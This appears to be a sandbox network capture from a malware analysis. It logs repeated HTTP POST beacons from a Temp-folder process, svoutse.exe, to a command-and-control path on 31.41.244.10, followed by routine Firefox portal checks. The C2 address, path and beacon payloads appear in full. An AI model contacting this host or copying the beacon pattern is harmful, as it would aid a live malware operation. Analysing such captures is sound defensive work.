Sep 6, 2024 09:58:39.549731016 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:39.781228065 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49807	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:39.903924942 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:40.608169079 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:40.612413883 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:40.839947939 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49809	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:40.952821970 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:41.666213989 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:41.667217970 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:41.895817041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49810	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:42.013978004 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:42.705595016 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:42.706427097 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:42.930799007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49812	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:43.057905912 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:43.751699924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:43.752623081 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:43.977420092 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49814	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:44.099611998 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:44.808090925 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:44.808897018 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:45.036900997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49815	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:45.166455030 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:45.881470919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:45.882464886 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:46.110848904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49816	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:46.241365910 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:46.939636946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:46.940519094 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:47.166702032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49817	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:47.279244900 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:47.971419096 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:47.972280979 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:48.202372074 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49818	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:48.318207026 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:49.016062975 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:49.016982079 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:49.243525028 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49819	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:49.352849007 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:50.052639961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:50.053719997 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:50.279352903 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49823	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:50.392992973 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:51.105015993 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:51.109752893 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:51.337781906 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49825	34.107.221.82	80	5932	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:50.711081982 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:51.156445026 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 10:01:34 GMT Age: 79037 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:51.469820976 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
